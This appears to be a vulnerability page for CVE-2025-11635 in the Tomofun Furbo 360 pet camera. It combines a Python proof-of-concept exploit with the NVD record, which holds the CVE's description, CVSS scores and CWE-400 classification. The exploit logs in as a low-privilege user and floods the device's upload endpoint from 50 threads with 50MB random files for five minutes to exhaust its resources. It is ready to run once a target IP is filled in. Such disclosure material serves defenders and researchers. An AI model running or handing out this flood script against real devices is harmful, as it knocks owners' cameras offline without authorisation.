CVE-2025-11635

# CVE-2025-11635 - Tomofun Furbo 360 File Upload Resource Consumption PoC # This PoC demonstrates resource exhaustion via the file upload component # Author: Security Researcher # Target: Tomofun Furbo 360 (firmware <= FB0035_FW_036) import requests import threading import time import os TARGET_URL = "http://<target_ip>/upload" # Replace with actual upload endpoint USERNAME = "low_priv_user" PASSWORD = "password123" THREAD_COUNT = 50 DURATION = 300 # seconds def authenticate(): """Authenticate to the Furbo 360 device with low-privilege credentials""" session = requests.Session() login_data = {"username": USERNAME, "password": PASSWORD} try: resp = session.post(f"http://<target_ip>/login", data=login_data, timeout=10) if resp.status_code == 200: print("[+] Authentication successful") return session except Exception as e: print(f"[-] Auth error: {e}") return None def generate_large_payload(size_mb=100): """Generate a large dummy file to exhaust device resources""" payload_path = "/tmp/large_upload.bin" with open(payload_path, "wb") as f: f.write(os.urandom(size_mb * 1024 * 1024)) return payload_path def upload_flood(session, thread_id): """Continuously upload files to exhaust device resources""" payload = generate_large_payload(50) # 50MB payload end_time = time.time() + DURATION count = 0 while time.time() < end_time: try: with open(payload, "rb") as f: files = {"file": (f"upload_{thread_id}_{count}.bin", f, "application/octet-stream")} resp = session.post(TARGET_URL, files=files, timeout=30) count += 1 if count % 10 == 0: print(f"[Thread-{thread_id}] Uploaded {count} files") except Exception as e: print(f"[Thread-{thread_id}] Error: {e}") time.sleep(1) def main(): print("[*] CVE-2025-11635 PoC - Resource Consumption Attack") print("[*] Target: Tomofun Furbo 360") session = authenticate() if not session: print("[-] Failed to authenticate. Exiting.") return print(f"[+] Starting {THREAD_COUNT} upload threads...") threads = [] for i in range(THREAD_COUNT): t = threading.Thread(target=upload_flood, args=(session, i)) t.daemon = True t.start() threads.append(t) for t in threads: t.join() print("[*] Attack completed. Device resources should be exhausted.") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-11635", "sourceIdentifier": "[email protected]", "published": "2025-10-12T14:15:35.360", "lastModified": "2025-10-30T19:44:57.317", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Tomofun Furbo 360 up to FB0035_FW_036. This vulnerability affects unknown code of the component File Upload. This manipulation causes resource consumption. Remote exploitation of the attack is possible. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-404"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:furbo:furbo_360_dog_camera_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "036", "matchCriteriaId": "6DDA1333-73CD-494A-8DD3-9543FDFD47A7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:furbo:furbo_360_dog_camera:*:*:*:*:*:*:*:*", "matchCriteriaId": "08CA8E77-413F-4849-A110-49DB5DDA29C5"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.328046", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328046", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.661354", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}